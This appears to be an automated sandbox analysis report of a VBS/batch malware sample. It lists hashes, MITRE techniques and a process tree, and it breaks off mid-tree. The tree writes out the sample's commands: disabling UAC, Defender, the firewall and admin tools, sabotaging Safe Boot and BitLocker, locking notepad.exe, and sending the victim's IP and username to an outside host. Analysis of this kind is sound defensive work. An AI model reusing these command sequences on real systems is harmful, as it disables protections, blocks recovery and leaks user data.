f1ad1ad54bbbb321cc210f44bc0c7d16f73a56f33964c9c0aa5f822c43302941

General

Target

malware.vbs
Size

6KB
MD5

23878a8e1e67a80e987c44a81e7a886d
SHA1

0330d6990bec48a65a1e359ebc1c9f51749e121d
SHA256

f1ad1ad54bbbb321cc210f44bc0c7d16f73a56f33964c9c0aa5f822c43302941
SHA512

c6948d90fb144a91f5d2b910314c04e91b0c3e22f6f9e8031ad3639803808420d7c80d35319ad1ac5e7adf810de019ec61434692f5a4bdff678bc39776f3189d
SSDEEP

96:qDfYNb8mN8r9f4PPfMSHnx2gqoij8RW8E/zmdPzWdEKuWP2W9NukS/MNa:qDfYqrZgX7yrCdPidfbU0a

Score

10^/10

discovery evasion execution exploit persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

5532 bcdedit.exe
5548 bcdedit.exe
5560 bcdedit.exe
5648 bcdedit.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

pid	process
5532	bcdedit.exe
5548	bcdedit.exe
5560	bcdedit.exe
5648	bcdedit.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

5400 netsh.exe
5952 netsh.exe
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

2192 icacls.exe
5388 takeown.exe
2900 icacls.exe
544 takeown.exe
5212 icacls.exe
5812 takeown.exe
5848 icacls.exe
2532 takeown.exe
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

5812 takeown.exe
5848 icacls.exe
2532 takeown.exe
2192 icacls.exe
5388 takeown.exe
2900 icacls.exe
544 takeown.exe
5212 icacls.exe

pid	process
5400	netsh.exe
5952	netsh.exe

pid	process
2192	icacls.exe
5388	takeown.exe
2900	icacls.exe
544	takeown.exe
5212	icacls.exe
5812	takeown.exe
5848	icacls.exe
2532	takeown.exe

pid	process
5812	takeown.exe
5848	icacls.exe
2532	takeown.exe
2192	icacls.exe
5388	takeown.exe
2900	icacls.exe
544	takeown.exe
5212	icacls.exe

Drops file in System32 directory 21 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	OpenWith.exe

Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

5564 sc.exe
5796 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

5880 ipconfig.exe
5844 ipconfig.exe

pid	process
5564	sc.exe
5796	sc.exe

pid	process
5880	ipconfig.exe
5844	ipconfig.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exeLogonUI.execmd.exereg.exereg.exereg.exereg.exeOpenWith.exeOpenWith.exereg.exeOpenWith.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\PreferredUILanguages = 720075002d005200550000000000	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer"	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "137"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000e2697c0c7ad8cd01	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	cmd.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows	reg.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\International	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableGPO = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ru-RU = "0419"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exeshutdown.exe

description	pid	process
Token: SeShutdownPrivilege	2996	powercfg.exe
Token: SeCreatePagefilePrivilege	2996	powercfg.exe
Token: SeShutdownPrivilege	412	powercfg.exe
Token: SeCreatePagefilePrivilege	412	powercfg.exe
Token: SeShutdownPrivilege	2824	powercfg.exe
Token: SeCreatePagefilePrivilege	2824	powercfg.exe
Token: SeShutdownPrivilege	4512	powercfg.exe
Token: SeCreatePagefilePrivilege	4512	powercfg.exe
Token: SeSystemtimePrivilege	4188	cmd.exe
Token: SeSystemtimePrivilege	4188	cmd.exe
Token: SeDebugPrivilege	5956	whoami.exe
Token: SeTakeOwnershipPrivilege	5388	takeown.exe
Token: SeShutdownPrivilege	5764	powercfg.exe
Token: SeCreatePagefilePrivilege	5764	powercfg.exe
Token: SeShutdownPrivilege	5808	powercfg.exe
Token: SeCreatePagefilePrivilege	5808	powercfg.exe
Token: SeShutdownPrivilege	5856	powercfg.exe
Token: SeCreatePagefilePrivilege	5856	powercfg.exe
Token: SeShutdownPrivilege	5868	powercfg.exe
Token: SeCreatePagefilePrivilege	5868	powercfg.exe
Token: SeDebugPrivilege	3152	whoami.exe
Token: SeTakeOwnershipPrivilege	544	takeown.exe
Token: SeTakeOwnershipPrivilege	5812	takeown.exe
Token: SeTakeOwnershipPrivilege	2532	takeown.exe
Token: SeShutdownPrivilege	4720	shutdown.exe
Token: SeRemoteShutdownPrivilege	4720	shutdown.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeLogonUI.exe

pid process

5704 OpenWith.exe
5892 OpenWith.exe
5124 OpenWith.exe
384 OpenWith.exe
2804 LogonUI.exe

pid	process
5704	OpenWith.exe
5892	OpenWith.exe
5124	OpenWith.exe
384	OpenWith.exe
2804	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exe

description	pid	process	target process
PID 4188 wrote to memory of 516	4188	cmd.exe	net.exe
PID 4188 wrote to memory of 516	4188	cmd.exe	net.exe
PID 516 wrote to memory of 5088	516	net.exe	net1.exe
PID 516 wrote to memory of 5088	516	net.exe	net1.exe
PID 4188 wrote to memory of 3672	4188	cmd.exe	msedge.exe
PID 4188 wrote to memory of 3672	4188	cmd.exe	msedge.exe
PID 4188 wrote to memory of 2996	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 2996	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 412	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 412	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 2824	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 2824	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 4512	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 4512	4188	cmd.exe	powercfg.exe
PID 4188 wrote to memory of 5400	4188	cmd.exe	netsh.exe
PID 4188 wrote to memory of 5400	4188	cmd.exe	netsh.exe
PID 4188 wrote to memory of 5444	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5444	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5464	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5464	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5480	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5480	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5496	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5496	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5512	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5512	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5528	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5528	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5544	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5544	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5560	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5560	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5576	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5576	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5592	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5592	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5608	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5608	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5624	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5624	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5640	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5640	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5656	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5656	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5672	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5672	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5688	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5688	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5704	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5704	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5720	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5720	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5736	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5736	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5752	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5752	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5768	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5768	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5784	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5784	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5800	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5800	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5816	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 5816	4188	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
1⤵
PID:624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,11746347647270949551,7786733067759450703,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8
1⤵
PID:1476

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4188

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:5088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=1234
2⤵
PID:3672

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:412

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4512

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5400

C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:5444

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:5464

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:5480

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:5496

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:5512

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:5528

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:5544

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:5560

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:5576

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5592

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:5608

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:5624

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:5640

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5656

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5672

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5688

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5704

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:5720

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:5736

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:5752

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:5768

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:5784

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:5800

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:5816

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:5832

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Disables RegEdit via registry modification
PID:5848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:5864

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:5880

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.106
2⤵
PID:5916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5940

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=13
2⤵
PID:6096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=gylqwjcn\admin
2⤵
PID:6132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "Admin"
2⤵
PID:5164

C:\Windows\system32\net.exe
net user "Admin"
3⤵
PID:5192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "Admin"
4⤵
PID:5212

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5388

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2900

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5440

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5516

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
